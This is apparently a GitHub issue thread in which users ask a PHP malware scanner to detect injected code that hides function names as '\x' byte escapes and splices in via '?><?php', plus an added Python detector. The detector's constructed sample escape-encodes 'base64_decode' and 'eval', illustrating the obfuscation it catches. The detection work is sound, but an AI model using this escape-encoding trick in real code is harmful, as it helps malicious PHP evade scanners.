
New Injection code

Open rufnek2k4 opened this issue 10 years ago • 2 comments

First of all, thanks for the effort.

I just fixed a site injected with this new code that has no base64_decode function. Fixed it by searching for "\x" and "?><?php" in every file.

Can you include this in your scanner? Thanks!

Actual code:


rufnek2k4, Jul 22 '14 21:07

I modified this script to work with multiple custom patterns here 4df5ccb36772c1c8749387155519f5437a7b7e36, but I had no luck (or time, for that matter) getting it working with escaped unicode characters (\x64\x65...). Maybe you can add a few patterns to that list...

darookee, Dec 19 '14 14:12
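A small detector for the two signals raised in this thread, added here as an example written in Python; it is not the scanner's own code nor anything the issue authors posted. It flags the `?><?php` re-open that splices injected code into an existing file, and it finds runs of PHP string byte escapes (`\xHH` hex or `\ooo` octal) and decodes them so the function name they hide shows up in the report. The sample file contents and the minimum run lengths are constructed for illustration.

```python
import re

# Two signals from the thread: closing and immediately re-opening PHP
# ("?><?php") to splice injected code into an existing file, and identifiers
# written as runs of escaped bytes ("\x64\x65" hex or "\156" octal) so that a
# plain grep for "base64_decode" finds nothing. The minimum run lengths
# (4 escapes) are constructed thresholds, not the scanner's own.
PATTERNS = {
    "php_reopen": re.compile(r"\?>\s*<\?php", re.IGNORECASE),
    "escaped_byte_run": re.compile(r"(?:\\(?:x[0-9a-fA-F]{2}|[0-7]{3})){4,}"),
}

# One PHP double-quoted string escape: \xHH (group 1) or \ooo (group 2)
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\([0-7]{3})")


def decode_escapes(s):
    """Turn a run of PHP byte escapes back into the identifier it hides."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE.sub(repl, s)


def scan_source(text):
    """Return {pattern_name: [findings]} for the contents of one file."""
    findings = {}
    for name, rx in PATTERNS.items():
        hits = [m.group(0) for m in rx.finditer(text)]
        if hits:
            # Report escape runs in decoded form so the reviewer sees the real name
            if name == "escaped_byte_run":
                hits = [decode_escapes(h) for h in hits]
            findings[name] = hits
    return findings


def scan_files(paths):
    """Scan each path; returns {path: findings} for files with at least one hit."""
    report = {}
    for p in paths:
        with open(p, "r", encoding="utf-8", errors="replace") as fh:
            f = scan_source(fh.read())
        if f:
            report[p] = f
    return report


# Constructed sample of an injected file; not the payload from the issue.
SAMPLE = ('<?php echo "hello"; ?><?php '
          '$f = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65"; '
          '$e = "\\x65\\166\\x61\\154"; $g = $f("aGk="); ?>')

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

The `php_reopen` pattern allows whitespace between the tags, so template files that legitimately close and reopen PHP will also match; treat that hit as a prompt for review rather than proof of injection, while a decoded escape run that spells a function name is a much stronger signal.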

Will look into this - thank you for posting...

mikestowe, Mar 03 '15 22:03